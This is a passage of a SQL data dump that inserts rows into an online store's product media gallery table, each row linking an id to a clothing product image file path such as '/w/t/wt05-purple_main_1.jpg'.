(2639, 90, '/w/s/ws01-green_main_1.jpg', 'image', 0),
(2640, 90, '/w/s/ws01-yellow_main_1.jpg', 'image', 0),
(2641, 90, '/w/s/ws01-black_main_1.jpg', 'image', 0),
(2642, 90, '/w/s/ws01-black_back_1.jpg', 'image', 0),
(2643, 90, '/w/s/ws01-green_main_1.jpg', 'image', 0),
(2644, 90, '/w/s/ws01-yellow_main_1.jpg', 'image', 0),
(2645, 90, '/w/s/ws01-black_main_1.jpg', 'image', 0),
(2646, 90, '/w/s/ws01-black_back_1.jpg', 'image', 0),
(2647, 90, '/w/s/ws01-green_main_1.jpg', 'image', 0),
(2648, 90, '/w/s/ws01-yellow_main_1.jpg', 'image', 0),
(2649, 90, '/w/s/ws01-black_main_1.jpg', 'image', 0),
(2650, 90, '/w/s/ws01-black_back_1.jpg', 'image', 0),
(2651, 90, '/w/s/ws01-green_main_1.jpg', 'image', 0),
(2652, 90, '/w/s/ws01-yellow_main_1.jpg', 'image', 0),
(2653, 90, '/w/s/ws01-black_main_1.jpg', 'image', 0),
(2654, 90, '/w/s/ws01-black_back_1.jpg', 'image', 0),
(2655, 90, '/w/s/ws05-black_main_1.jpg', 'image', 0),
(2656, 90, '/w/s/ws05-black_alt1_1.jpg', 'image', 0),
(2657, 90, '/w/s/ws05-black_back_1.jpg', 'image', 0),
(2658, 90, '/w/s/ws05-orange_main_1.jpg', 'image', 0),
(2659, 90, '/w/s/ws05-yellow_main_1.jpg', 'image', 0),
(2660, 90, '/w/s/ws05-black_main_1.jpg', 'image', 0),
(2661, 90, '/w/s/ws05-black_alt1_1.jpg', 'image', 0),
(2662, 90, '/w/s/ws05-black_back_1.jpg', 'image', 0),
(2663, 90, '/w/s/ws05-orange_main_1.jpg', 'image', 0),
(2664, 90, '/w/s/ws05-yellow_main_1.jpg', 'image', 0),
(2665, 90, '/w/s/ws05-black_main_1.jpg', 'image', 0),
(2666, 90, '/w/s/ws05-black_alt1_1.jpg', 'image', 0),
(2667, 90, '/w/s/ws05-black_back_1.jpg', 'image', 0),
(2668, 90, '/w/s/ws05-orange_main_1.jpg', 'image', 0),
(2669, 90, '/w/s/ws05-yellow_main_1.jpg', 'image', 0),
(2670, 90, '/w/s/ws05-black_main_1.jpg', 'image', 0),
(2671, 90, '/w/s/ws05-black_alt1_1.jpg', 'image', 0),
(2672, 90, '/w/s/ws05-black_back_1.jpg', 'image', 0),
(2673, 90, '/w/s/ws05-orange_main_1.jpg', 'image', 0),
(2674, 90, '/w/s/ws05-yellow_main_1.jpg', 'image', 0),
(2675, 90, '/w/s/ws05-black_main_1.jpg', 'image', 0),
(2676, 90, '/w/s/ws05-black_alt1_1.jpg', 'image', 0),
(2677, 90, '/w/s/ws05-black_back_1.jpg', 'image', 0),
(2678, 90, '/w/s/ws05-orange_main_1.jpg', 'image', 0),
(2679, 90, '/w/s/ws05-yellow_main_1.jpg', 'image', 0),
(2680, 90, '/w/s/ws05-black_main_1.jpg', 'image', 0),
(2681, 90, '/w/s/ws05-black_alt1_1.jpg', 'image', 0),
(2682, 90, '/w/s/ws05-black_back_1.jpg', 'image', 0),
(2683, 90, '/w/b/wb01-black_main_1.jpg', 'image', 0),
(2684, 90, '/w/b/wb01-black-0_1.jpg', 'image', 0),
(2685, 90, '/w/b/wb01-gray_main_1.jpg', 'image', 0),
(2686, 90, '/w/b/wb01-gray_alt1_1.jpg', 'image', 0),
(2687, 90, '/w/b/wb01-gray_back_1.jpg', 'image', 0),
(2688, 90, '/w/b/wb01-purple_main_1.jpg', 'image', 0),
(2689, 90, '/w/b/wb01-black_main_1.jpg', 'image', 0),
(2690, 90, '/w/b/wb01-black-0_1.jpg', 'image', 0),
(2691, 90, '/w/b/wb01-gray_main_1.jpg', 'image', 0),
(2692, 90, '/w/b/wb01-gray_alt1_1.jpg', 'image', 0),
(2693, 90, '/w/b/wb01-gray_back_1.jpg', 'image', 0),
(2694, 90, '/w/b/wb01-purple_main_1.jpg', 'image', 0),
(2695, 90, '/w/b/wb01-black_main_1.jpg', 'image', 0),
(2696, 90, '/w/b/wb01-black-0_1.jpg', 'image', 0),
(2697, 90, '/w/b/wb01-gray_main_1.jpg', 'image', 0),
(2698, 90, '/w/b/wb01-gray_alt1_1.jpg', 'image', 0),
(2699, 90, '/w/b/wb01-gray_back_1.jpg', 'image', 0),
(2700, 90, '/w/b/wb01-purple_main_1.jpg', 'image', 0),
(2701, 90, '/w/b/wb01-black_main_1.jpg', 'image', 0),
(2702, 90, '/w/b/wb01-black-0_1.jpg', 'image', 0),
(2703, 90, '/w/b/wb01-gray_main_1.jpg', 'image', 0),
(2704, 90, '/w/b/wb01-gray_alt1_1.jpg', 'image', 0),
(2705, 90, '/w/b/wb01-gray_back_1.jpg', 'image', 0),
(2706, 90, '/w/b/wb01-purple_main_1.jpg', 'image', 0),
(2707, 90, '/w/b/wb01-black_main_1.jpg', 'image', 0),
(2708, 90, '/w/b/wb01-black-0_1.jpg', 'image', 0),
(2709, 90, '/w/b/wb01-gray_main_1.jpg', 'image', 0),
(2710, 90, '/w/b/wb01-gray_alt1_1.jpg', 'image', 0),
(2711, 90, '/w/b/wb01-gray_back_1.jpg', 'image', 0),
(2712, 90, '/w/b/wb01-purple_main_1.jpg', 'image', 0),
(2713, 90, '/w/b/wb01-gray_main_1.jpg', 'image', 0),
(2714, 90, '/w/b/wb01-gray_alt1_1.jpg', 'image', 0),
(2715, 90, '/w/b/wb01-gray_back_1.jpg', 'image', 0),
(2716, 90, '/w/b/wb02-blue_main_1.jpg', 'image', 0),
(2717, 90, '/w/b/wb02-blue_alt1_1.jpg', 'image', 0),
(2718, 90, '/w/b/wb02-blue_back_1.jpg', 'image', 0),
(2719, 90, '/w/b/wb02-orange_main_1.jpg', 'image', 0),
(2720, 90, '/w/b/wb02-yellow_main_1.jpg', 'image', 0),
(2721, 90, '/w/b/wb02-blue_main_1.jpg', 'image', 0),
(2722, 90, '/w/b/wb02-blue_alt1_1.jpg', 'image', 0),
(2723, 90, '/w/b/wb02-blue_back_1.jpg', 'image', 0),
(2724, 90, '/w/b/wb02-orange_main_1.jpg', 'image', 0),
(2725, 90, '/w/b/wb02-yellow_main_1.jpg', 'image', 0),
(2726, 90, '/w/b/wb02-blue_main_1.jpg', 'image', 0),
(2727, 90, '/w/b/wb02-blue_alt1_1.jpg', 'image', 0),
(2728, 90, '/w/b/wb02-blue_back_1.jpg', 'image', 0),
(2729, 90, '/w/b/wb02-orange_main_1.jpg', 'image', 0),
(2730, 90, '/w/b/wb02-yellow_main_1.jpg', 'image', 0),
(2731, 90, '/w/b/wb02-blue_main_1.jpg', 'image', 0),
(2732, 90, '/w/b/wb02-blue_alt1_1.jpg', 'image', 0),
(2733, 90, '/w/b/wb02-blue_back_1.jpg', 'image', 0),
(2734, 90, '/w/b/wb02-orange_main_1.jpg', 'image', 0),
(2735, 90, '/w/b/wb02-yellow_main_1.jpg', 'image', 0),
(2736, 90, '/w/b/wb02-blue_main_1.jpg', 'image', 0),
(2737, 90, '/w/b/wb02-blue_alt1_1.jpg', 'image', 0),
(2738, 90, '/w/b/wb02-blue_back_1.jpg', 'image', 0),
(2739, 90, '/w/b/wb02-orange_main_1.jpg', 'image', 0),
(2740, 90, '/w/b/wb02-yellow_main_1.jpg', 'image', 0),
(2741, 90, '/w/b/wb02-blue_main_1.jpg', 'image', 0),
(2742, 90, '/w/b/wb02-blue_alt1_1.jpg', 'image', 0),
(2743, 90, '/w/b/wb02-blue_back_1.jpg', 'image', 0),
(2744, 90, '/w/b/wb03-green_main_1.jpg', 'image', 0),
(2745, 90, '/w/b/wb03-green_alt1_1.jpg', 'image', 0),
(2746, 90, '/w/b/wb03-green_back_1.jpg', 'image', 0),
(2747, 90, '/w/b/wb03-red_main_1.jpg', 'image', 0),
(2748, 90, '/w/b/wb03-yellow_main_1.jpg', 'image', 0),
(2749, 90, '/w/b/wb03-green_main_1.jpg', 'image', 0),
(2750, 90, '/w/b/wb03-green_alt1_1.jpg', 'image', 0),
(2751, 90, '/w/b/wb03-green_back_1.jpg', 'image', 0),
(2752, 90, '/w/b/wb03-red_main_1.jpg', 'image', 0),
(2753, 90, '/w/b/wb03-yellow_main_1.jpg', 'image', 0),
(2754, 90, '/w/b/wb03-green_main_1.jpg', 'image', 0),
(2755, 90, '/w/b/wb03-green_alt1_1.jpg', 'image', 0),
(2756, 90, '/w/b/wb03-green_back_1.jpg', 'image', 0),
(2757, 90, '/w/b/wb03-red_main_1.jpg', 'image', 0),
(2758, 90, '/w/b/wb03-yellow_main_1.jpg', 'image', 0),
(2759, 90, '/w/b/wb03-green_main_1.jpg', 'image', 0),
(2760, 90, '/w/b/wb03-green_alt1_1.jpg', 'image', 0),
(2761, 90, '/w/b/wb03-green_back_1.jpg', 'image', 0),
(2762, 90, '/w/b/wb03-red_main_1.jpg', 'image', 0),
(2763, 90, '/w/b/wb03-yellow_main_1.jpg', 'image', 0),
(2764, 90, '/w/b/wb03-green_main_1.jpg', 'image', 0),
(2765, 90, '/w/b/wb03-green_alt1_1.jpg', 'image', 0),
(2766, 90, '/w/b/wb03-green_back_1.jpg', 'image', 0),
(2767, 90, '/w/b/wb03-red_main_1.jpg', 'image', 0),
(2768, 90, '/w/b/wb03-yellow_main_1.jpg', 'image', 0),
(2769, 90, '/w/b/wb03-green_main_1.jpg', 'image', 0),
(2770, 90, '/w/b/wb03-green_alt1_1.jpg', 'image', 0),
(2771, 90, '/w/b/wb03-green_back_1.jpg', 'image', 0),
(2772, 90, '/w/b/wb04-blue_main_1.jpg', 'image', 0),
(2773, 90, '/w/b/wb04-blue-0_1.jpg', 'image', 0),
(2774, 90, '/w/b/wb04-blue_alt1_1.jpg', 'image', 0),
(2775, 90, '/w/b/wb04-blue_back_1.jpg', 'image', 0),
(2776, 90, '/w/b/wb04-purple_main_1.jpg', 'image', 0),
(2777, 90, '/w/b/wb04-yellow_main_1.jpg', 'image', 0),
(2778, 90, '/w/b/wb04-blue_main_1.jpg', 'image', 0),
(2779, 90, '/w/b/wb04-blue-0_1.jpg', 'image', 0),
(2780, 90, '/w/b/wb04-blue_alt1_1.jpg', 'image', 0),
(2781, 90, '/w/b/wb04-blue_back_1.jpg', 'image', 0),
(2782, 90, '/w/b/wb04-purple_main_1.jpg', 'image', 0),
(2783, 90, '/w/b/wb04-yellow_main_1.jpg', 'image', 0),
(2784, 90, '/w/b/wb04-blue_main_1.jpg', 'image', 0),
(2785, 90, '/w/b/wb04-blue-0_1.jpg', 'image', 0),
(2786, 90, '/w/b/wb04-blue_alt1_1.jpg', 'image', 0),
(2787, 90, '/w/b/wb04-blue_back_1.jpg', 'image', 0),
(2788, 90, '/w/b/wb04-purple_main_1.jpg', 'image', 0),
(2789, 90, '/w/b/wb04-yellow_main_1.jpg', 'image', 0),
(2790, 90, '/w/b/wb04-blue_main_1.jpg', 'image', 0),
(2791, 90, '/w/b/wb04-blue-0_1.jpg', 'image', 0),
(2792, 90, '/w/b/wb04-blue_alt1_1.jpg', 'image', 0),
(2793, 90, '/w/b/wb04-blue_back_1.jpg', 'image', 0),
(2794, 90, '/w/b/wb04-purple_main_2.jpg', 'image', 0),
(2795, 90, '/w/b/wb04-yellow_main_2.jpg', 'image', 0),
(2796, 90, '/w/b/wb04-blue_main_2.jpg', 'image', 0),
(2797, 90, '/w/b/wb04-blue-0_2.jpg', 'image', 0),
(2798, 90, '/w/b/wb04-blue_alt1_2.jpg', 'image', 0),
(2799, 90, '/w/b/wb04-blue_back_2.jpg', 'image', 0),
(2800, 90, '/w/b/wb04-purple_main_2.jpg', 'image', 0),
(2801, 90, '/w/b/wb04-yellow_main_2.jpg', 'image', 0),
(2802, 90, '/w/b/wb04-blue_main_2.jpg', 'image', 0),
(2803, 90, '/w/b/wb04-blue-0_2.jpg', 'image', 0),
(2804, 90, '/w/b/wb04-blue_alt1_2.jpg', 'image', 0),
(2805, 90, '/w/b/wb04-blue_back_2.jpg', 'image', 0),
(2806, 90, '/w/b/wb05-black_main_1.jpg', 'image', 0),
(2807, 90, '/w/b/wb05-black_back_1.jpg', 'image', 0),
(2808, 90, '/w/b/wb05-orange_main_1.jpg', 'image', 0),
(2809, 90, '/w/b/wb05-purple_main_1.jpg', 'image', 0),
(2810, 90, '/w/b/wb05-black_main_1.jpg', 'image', 0),
(2811, 90, '/w/b/wb05-black_back_1.jpg', 'image', 0),
(2812, 90, '/w/b/wb05-orange_main_1.jpg', 'image', 0),
(2813, 90, '/w/b/wb05-purple_main_1.jpg', 'image', 0),
(2814, 90, '/w/b/wb05-black_main_1.jpg', 'image', 0),
(2815, 90, '/w/b/wb05-black_back_1.jpg', 'image', 0),
(2816, 90, '/w/b/wb05-orange_main_1.jpg', 'image', 0),
(2817, 90, '/w/b/wb05-purple_main_1.jpg', 'image', 0),
(2818, 90, '/w/b/wb05-black_main_1.jpg', 'image', 0),
(2819, 90, '/w/b/wb05-black_back_1.jpg', 'image', 0),
(2820, 90, '/w/b/wb05-orange_main_1.jpg', 'image', 0),
(2821, 90, '/w/b/wb05-purple_main_1.jpg', 'image', 0),
(2822, 90, '/w/b/wb05-black_main_1.jpg', 'image', 0),
(2823, 90, '/w/b/wb05-black_back_1.jpg', 'image', 0),
(2824, 90, '/w/b/wb05-orange_main_1.jpg', 'image', 0),
(2825, 90, '/w/b/wb05-purple_main_1.jpg', 'image', 0),
(2826, 90, '/w/b/wb05-black_main_1.jpg', 'image', 0),
(2827, 90, '/w/b/wb05-black_back_1.jpg', 'image', 0),
(2828, 90, '/w/t/wt01-black_main_1.jpg', 'image', 0),
(2829, 90, '/w/t/wt01-blue_main_1.jpg', 'image', 0),
(2830, 90, '/w/t/wt01-blue_back_1.jpg', 'image', 0),
(2831, 90, '/w/t/wt01-orange_main_1.jpg', 'image', 0),
(2832, 90, '/w/t/wt01-black_main_1.jpg', 'image', 0),
(2833, 90, '/w/t/wt01-blue_main_1.jpg', 'image', 0),
(2834, 90, '/w/t/wt01-blue_back_1.jpg', 'image', 0),
(2835, 90, '/w/t/wt01-orange_main_1.jpg', 'image', 0),
(2836, 90, '/w/t/wt01-black_main_1.jpg', 'image', 0),
(2837, 90, '/w/t/wt01-blue_main_1.jpg', 'image', 0),
(2838, 90, '/w/t/wt01-blue_back_1.jpg', 'image', 0),
(2839, 90, '/w/t/wt01-orange_main_1.jpg', 'image', 0),
(2840, 90, '/w/t/wt01-black_main_1.jpg', 'image', 0),
(2841, 90, '/w/t/wt01-blue_main_1.jpg', 'image', 0),
(2842, 90, '/w/t/wt01-blue_back_1.jpg', 'image', 0),
(2843, 90, '/w/t/wt01-orange_main_1.jpg', 'image', 0),
(2844, 90, '/w/t/wt01-black_main_1.jpg', 'image', 0),
(2845, 90, '/w/t/wt01-blue_main_1.jpg', 'image', 0),
(2846, 90, '/w/t/wt01-blue_back_1.jpg', 'image', 0),
(2847, 90, '/w/t/wt01-orange_main_1.jpg', 'image', 0),
(2848, 90, '/w/t/wt01-blue_main_1.jpg', 'image', 0),
(2849, 90, '/w/t/wt01-blue_back_1.jpg', 'image', 0),
(2850, 90, '/w/t/wt02-green_main_1.jpg', 'image', 0),
(2851, 90, '/w/t/wt02-orange_main_1.jpg', 'image', 0),
(2852, 90, '/w/t/wt02-orange_back_1.jpg', 'image', 0),
(2853, 90, '/w/t/wt02-yellow_main_1.jpg', 'image', 0),
(2854, 90, '/w/t/wt02-green_main_1.jpg', 'image', 0),
(2855, 90, '/w/t/wt02-orange_main_1.jpg', 'image', 0),
(2856, 90, '/w/t/wt02-orange_back_1.jpg', 'image', 0),
(2857, 90, '/w/t/wt02-yellow_main_1.jpg', 'image', 0),
(2858, 90, '/w/t/wt02-green_main_1.jpg', 'image', 0),
(2859, 90, '/w/t/wt02-orange_main_1.jpg', 'image', 0),
(2860, 90, '/w/t/wt02-orange_back_1.jpg', 'image', 0),
(2861, 90, '/w/t/wt02-yellow_main_1.jpg', 'image', 0),
(2862, 90, '/w/t/wt02-green_main_1.jpg', 'image', 0),
(2863, 90, '/w/t/wt02-orange_main_1.jpg', 'image', 0),
(2864, 90, '/w/t/wt02-orange_back_1.jpg', 'image', 0),
(2865, 90, '/w/t/wt02-yellow_main_1.jpg', 'image', 0),
(2866, 90, '/w/t/wt02-green_main_1.jpg', 'image', 0),
(2867, 90, '/w/t/wt02-orange_main_1.jpg', 'image', 0),
(2868, 90, '/w/t/wt02-orange_back_1.jpg', 'image', 0),
(2869, 90, '/w/t/wt02-yellow_main_1.jpg', 'image', 0),
(2870, 90, '/w/t/wt02-orange_main_1.jpg', 'image', 0),
(2871, 90, '/w/t/wt02-orange_back_1.jpg', 'image', 0),
(2872, 90, '/w/t/wt03-orange_main_1.jpg', 'image', 0),
(2873, 90, '/w/t/wt03-purple_main_1.jpg', 'image', 0),
(2874, 90, '/w/t/wt03-red_main_1.jpg', 'image', 0),
(2875, 90, '/w/t/wt03-red_alt1_1.jpg', 'image', 0),
(2876, 90, '/w/t/wt03-red_back_1.jpg', 'image', 0),
(2877, 90, '/w/t/wt03-orange_main_1.jpg', 'image', 0),
(2878, 90, '/w/t/wt03-purple_main_1.jpg', 'image', 0),
(2879, 90, '/w/t/wt03-red_main_1.jpg', 'image', 0),
(2880, 90, '/w/t/wt03-red_alt1_1.jpg', 'image', 0),
(2881, 90, '/w/t/wt03-red_back_1.jpg', 'image', 0),
(2882, 90, '/w/t/wt03-orange_main_1.jpg', 'image', 0),
(2883, 90, '/w/t/wt03-purple_main_1.jpg', 'image', 0),
(2884, 90, '/w/t/wt03-red_main_1.jpg', 'image', 0),
(2885, 90, '/w/t/wt03-red_alt1_1.jpg', 'image', 0),
(2886, 90, '/w/t/wt03-red_back_1.jpg', 'image', 0),
(2887, 90, '/w/t/wt03-orange_main_1.jpg', 'image', 0),
(2888, 90, '/w/t/wt03-purple_main_1.jpg', 'image', 0),
(2889, 90, '/w/t/wt03-red_main_1.jpg', 'image', 0),
(2890, 90, '/w/t/wt03-red_alt1_1.jpg', 'image', 0),
(2891, 90, '/w/t/wt03-red_back_1.jpg', 'image', 0),
(2892, 90, '/w/t/wt03-orange_main_1.jpg', 'image', 0),
(2893, 90, '/w/t/wt03-purple_main_1.jpg', 'image', 0),
(2894, 90, '/w/t/wt03-red_main_1.jpg', 'image', 0),
(2895, 90, '/w/t/wt03-red_alt1_1.jpg', 'image', 0),
(2896, 90, '/w/t/wt03-red_back_1.jpg', 'image', 0),
(2897, 90, '/w/t/wt03-red_main_1.jpg', 'image', 0),
(2898, 90, '/w/t/wt03-red_alt1_1.jpg', 'image', 0),
(2899, 90, '/w/t/wt03-red_back_1.jpg', 'image', 0),
(2900, 90, '/w/t/wt04-blue_main_1.jpg', 'image', 0),
(2901, 90, '/w/t/wt04-blue_back_1.jpg', 'image', 0),
(2902, 90, '/w/t/wt04-purple_main_1.jpg', 'image', 0),
(2903, 90, '/w/t/wt04-red_main_1.jpg', 'image', 0),
(2904, 90, '/w/t/wt04-blue_main_1.jpg', 'image', 0),
(2905, 90, '/w/t/wt04-blue_back_1.jpg', 'image', 0),
(2906, 90, '/w/t/wt04-purple_main_1.jpg', 'image', 0),
(2907, 90, '/w/t/wt04-red_main_1.jpg', 'image', 0),
(2908, 90, '/w/t/wt04-blue_main_1.jpg', 'image', 0),
(2909, 90, '/w/t/wt04-blue_back_1.jpg', 'image', 0),
(2910, 90, '/w/t/wt04-purple_main_1.jpg', 'image', 0),
(2911, 90, '/w/t/wt04-red_main_1.jpg', 'image', 0),
(2912, 90, '/w/t/wt04-blue_main_1.jpg', 'image', 0),
(2913, 90, '/w/t/wt04-blue_back_1.jpg', 'image', 0),
(2914, 90, '/w/t/wt04-purple_main_1.jpg', 'image', 0),
(2915, 90, '/w/t/wt04-red_main_1.jpg', 'image', 0),
(2916, 90, '/w/t/wt04-blue_main_1.jpg', 'image', 0),
(2917, 90, '/w/t/wt04-blue_back_1.jpg', 'image', 0),
(2918, 90, '/w/t/wt04-purple_main_1.jpg', 'image', 0),
(2919, 90, '/w/t/wt04-red_main_1.jpg', 'image', 0),
(2920, 90, '/w/t/wt04-blue_main_1.jpg', 'image', 0),
(2921, 90, '/w/t/wt04-blue_back_1.jpg', 'image', 0);
INSERT INTO `catalog_product_entity_media_gallery` (`value_id`, `attribute_id`, `value`, `media_type`, `disabled`) VALUES
(2922, 90, '/w/t/wt05-orange_main_1.jpg', 'image', 0),
(2923, 90, '/w/t/wt05-purple_main_1.jpg', 'image', 0),
(2924, 90, '/w/t/wt05-purple_alt1_1.jpg', 'image', 0),
(2925, 90, '/w/t/wt05-purple_back_1.jpg', 'image', 0),
(2926, 90, '/w/t/wt05-white_main_1.jpg', 'image', 0),
(2927, 90, '/w/t/wt05-orange_main_1.jpg', 'image', 0),
(2928, 90, '/w/t/wt05-purple_main_1.jpg', 'image', 0),
(2929, 90, '/w/t/wt05-purple_alt1_1.jpg', 'image', 0),
(2930, 90, '/w/t/wt05-purple_back_1.jpg', 'image', 0),
(2931, 90, '/w/t/wt05-white_main_1.jpg', 'image', 0),
(2932, 90, '/w/t/wt05-orange_main_1.jpg', 'image', 0),
(2933, 90, '/w/t/wt05-purple_main_1.jpg', 'image', 0),
(2934, 90, '/w/t/wt05-purple_alt1_1.jpg', 'image', 0),
(2935, 90, '/w/t/wt05-purple_back_1.jpg', 'image', 0),
(2936, 90, '/w/t/wt05-white_main_1.jpg', 'image', 0),
(2937, 90, '/w/t/wt05-orange_main_1.jpg', 'image', 0),
(2938, 90, '/w/t/wt05-purple_main_1.jpg', 'image', 0),
(2939, 90, '/w/t/wt05-purple_alt1_1.jpg', 'image', 0),
(2940, 90, '/w/t/wt05-purple_back_1.jpg', 'image', 0),
(2941, 90, '/w/t/wt05-white_main_1.jpg', 'image', 0),
(2942, 90, '/w/t/wt05-orange_main_1.jpg', 'image', 0),
(2943, 90, '/w/t/wt05-purple_main_1.jpg', 'image', 0),
(2944, 90, '/w/t/wt05-purple_alt1_1.jpg', 'image', 0),
(2945, 90, '/w/t/wt05-purple_back_1.jpg', 'image', 0),
(2946, 90, '/w/t/wt05-white_main_2.jpg', 'image', 0),
(2947, 90, '/w/t/wt05-purple_main_2.jpg', 'image', 0),
(2948, 90, '/w/t/wt05-purple_alt1_2.jpg', 'image', 0),
(2949, 90, '/w/t/wt05-purple_back_2.jpg', 'image', 0),
(2950, 90, '/w/t/wt06-blue_main_1.jpg', 'image', 0),
(2951, 90, '/w/t/wt06-blue_back_1.jpg', 'image', 0),
(2952, 90, '/w/t/wt06-red_main_1.jpg', 'image', 0),
(2953, 90, '/w/t/wt06-yellow_main_1.jpg', 'image', 0),
(2954, 90, '/w/t/wt06-blue_main_1.jpg', 'image', 0),
(2955, 90, '/w/t/wt06-blue_back_1.jpg', 'image', 0),
(2956, 90, '/w/t/wt06-red_main_1.jpg', 'image', 0),
(2957, 90, '/w/t/wt06-yellow_main_1.jpg', 'image', 0),
(2958, 90, '/w/t/wt06-blue_main_1.jpg', 'image', 0),
(2959, 90, '/w/t/wt06-blue_back_1.jpg', 'image', 0),
(2960, 90, '/w/t/wt06-red_main_1.jpg', 'image', 0),
(2961, 90, '/w/t/wt06-yellow_main_1.jpg', 'image', 0),
(2962, 90, '/w/t/wt06-blue_main_1.jpg', 'image', 0),
(2963, 90, '/w/t/wt06-blue_back_1.jpg', 'image', 0),
(2964, 90, '/w/t/wt06-red_main_1.jpg', 'image', 0),
(2965, 90, '/w/t/wt06-yellow_main_1.jpg', 'image', 0),
(2966, 90, '/w/t/wt06-blue_main_1.jpg', 'image', 0),
(2967, 90, '/w/t/wt06-blue_back_1.jpg', 'image', 0),
(2968, 90, '/w/t/wt06-red_main_1.jpg', 'image', 0),
(2969, 90, '/w/t/wt06-yellow_main_1.jpg', 'image', 0),
(2970, 90, '/w/t/wt06-blue_main_1.jpg', 'image', 0),
(2971, 90, '/w/t/wt06-blue_back_1.jpg', 'image', 0),
(2972, 90, '/w/t/wt07-green_main_1.jpg', 'image', 0),
(2973, 90, '/w/t/wt07-green_alt1_1.jpg', 'image', 0),
(2974, 90, '/w/t/wt07-green_back_1.jpg', 'image', 0),
(2975, 90, '/w/t/wt07-white_main_1.jpg', 'image', 0),
(2976, 90, '/w/t/wt07-yellow_main_1.jpg', 'image', 0),
(2977, 90, '/w/t/wt07-green_main_1.jpg', 'image', 0),
(2978, 90, '/w/t/wt07-green_alt1_1.jpg', 'image', 0),
(2979, 90, '/w/t/wt07-green_back_1.jpg', 'image', 0),
(2980, 90, '/w/t/wt07-white_main_1.jpg', 'image', 0),
(2981, 90, '/w/t/wt07-yellow_main_1.jpg', 'image', 0),
(2982, 90, '/w/t/wt07-green_main_1.jpg', 'image', 0),
(2983, 90, '/w/t/wt07-green_alt1_1.jpg', 'image', 0),
(2984, 90, '/w/t/wt07-green_back_1.jpg', 'image', 0),
(2985, 90, '/w/t/wt07-white_main_1.jpg', 'image', 0),
(2986, 90, '/w/t/wt07-yellow_main_1.jpg', 'image', 0),
(2987, 90, '/w/t/wt07-green_main_1.jpg', 'image', 0),
(2988, 90, '/w/t/wt07-green_alt1_1.jpg', 'image', 0),
(2989, 90, '/w/t/wt07-green_back_1.jpg', 'image', 0),
(2990, 90, '/w/t/wt07-white_main_1.jpg', 'image', 0),
(2991, 90, '/w/t/wt07-yellow_main_1.jpg', 'image', 0),
(2992, 90, '/w/t/wt07-green_main_1.jpg', 'image', 0),
(2993, 90, '/w/t/wt07-green_alt1_1.jpg', 'image', 0),
(2994, 90, '/w/t/wt07-green_back_1.jpg', 'image', 0),
(2995, 90, '/w/t/wt07-white_main_1.jpg', 'image', 0),
(2996, 90, '/w/t/wt07-yellow_main_1.jpg', 'image', 0),
(2997, 90, '/w/t/wt07-green_main_1.jpg', 'image', 0),
(2998, 90, '/w/t/wt07-green_alt1_1.jpg', 'image', 0),
(2999, 90, '/w/t/wt07-green_back_1.jpg', 'image', 0),
(3000, 90, '/w/t/wt08-black_main_1.jpg', 'image', 0),
(3001, 90, '/w/t/wt08-black_alt1_1.jpg', 'image', 0),
(3002, 90, '/w/t/wt08-black_back_1.jpg', 'image', 0),
(3003, 90, '/w/t/wt08-purple_main_1.jpg', 'image', 0),
(3004, 90, '/w/t/wt08-yellow_main_1.jpg', 'image', 0),
(3005, 90, '/w/t/wt08-black_main_1.jpg', 'image', 0),
(3006, 90, '/w/t/wt08-black_alt1_1.jpg', 'image', 0),
(3007, 90, '/w/t/wt08-black_back_1.jpg', 'image', 0),
(3008, 90, '/w/t/wt08-purple_main_1.jpg', 'image', 0),
(3009, 90, '/w/t/wt08-yellow_main_1.jpg', 'image', 0),
(3010, 90, '/w/t/wt08-black_main_1.jpg', 'image', 0),
(3011, 90, '/w/t/wt08-black_alt1_1.jpg', 'image', 0),
(3012, 90, '/w/t/wt08-black_back_1.jpg', 'image', 0),
(3013, 90, '/w/t/wt08-purple_main_1.jpg', 'image', 0),
(3014, 90, '/w/t/wt08-yellow_main_1.jpg', 'image', 0),
(3015, 90, '/w/t/wt08-black_main_1.jpg', 'image', 0),
(3016, 90, '/w/t/wt08-black_alt1_1.jpg', 'image', 0),
(3017, 90, '/w/t/wt08-black_back_1.jpg', 'image', 0),
(3018, 90, '/w/t/wt08-purple_main_1.jpg', 'image', 0),
(3019, 90, '/w/t/wt08-yellow_main_1.jpg', 'image', 0),
(3020, 90, '/w/t/wt08-black_main_1.jpg', 'image', 0),
(3021, 90, '/w/t/wt08-black_alt1_1.jpg', 'image', 0),
(3022, 90, '/w/t/wt08-black_back_1.jpg', 'image', 0),
(3023, 90, '/w/t/wt08-purple_main_1.jpg', 'image', 0),
(3024, 90, '/w/t/wt08-yellow_main_1.jpg', 'image', 0),
(3025, 90, '/w/t/wt08-black_main_1.jpg', 'image', 0),
(3026, 90, '/w/t/wt08-black_alt1_1.jpg', 'image', 0),
(3027, 90, '/w/t/wt08-black_back_1.jpg', 'image', 0),
(3028, 90, '/w/t/wt09-purple_main_1.jpg', 'image', 0),
(3029, 90, '/w/t/wt09-white_main_1.jpg', 'image', 0),
(3030, 90, '/w/t/wt09-white_back_1.jpg', 'image', 0),
(3031, 90, '/w/t/wt09-yellow_main_1.jpg', 'image', 0),
(3032, 90, '/w/t/wt09-purple_main_1.jpg', 'image', 0),
(3033, 90, '/w/t/wt09-white_main_1.jpg', 'image', 0),
(3034, 90, '/w/t/wt09-white_back_1.jpg', 'image', 0),
(3035, 90, '/w/t/wt09-yellow_main_1.jpg', 'image', 0),
(3036, 90, '/w/t/wt09-purple_main_1.jpg', 'image', 0),
(3037, 90, '/w/t/wt09-white_main_1.jpg', 'image', 0),
(3038, 90, '/w/t/wt09-white_back_1.jpg', 'image', 0),
(3039, 90, '/w/t/wt09-yellow_main_1.jpg', 'image', 0),
(3040, 90, '/w/t/wt09-purple_main_1.jpg', 'image', 0),
(3041, 90, '/w/t/wt09-white_main_1.jpg', 'image', 0),
(3042, 90, '/w/t/wt09-white_back_1.jpg', 'image', 0),
(3043, 90, '/w/t/wt09-yellow_main_1.jpg', 'image', 0),
(3044, 90, '/w/t/wt09-purple_main_1.jpg', 'image', 0),
(3045, 90, '/w/t/wt09-white_main_1.jpg', 'image', 0),
(3046, 90, '/w/t/wt09-white_back_1.jpg', 'image', 0),
(3047, 90, '/w/t/wt09-yellow_main_1.jpg', 'image', 0),
(3048, 90, '/w/t/wt09-white_main_1.jpg', 'image', 0),
(3049, 90, '/w/t/wt09-white_back_1.jpg', 'image', 0),
(3050, 90, '/w/p/wp01-black_main_1.jpg', 'image', 0),
(3051, 90, '/w/p/wp01-gray_main_1.jpg', 'image', 0),
(3052, 90, '/w/p/wp01-gray_back_1.jpg', 'image', 0),
(3053, 90, '/w/p/wp01-white_main_1.jpg', 'image', 0),
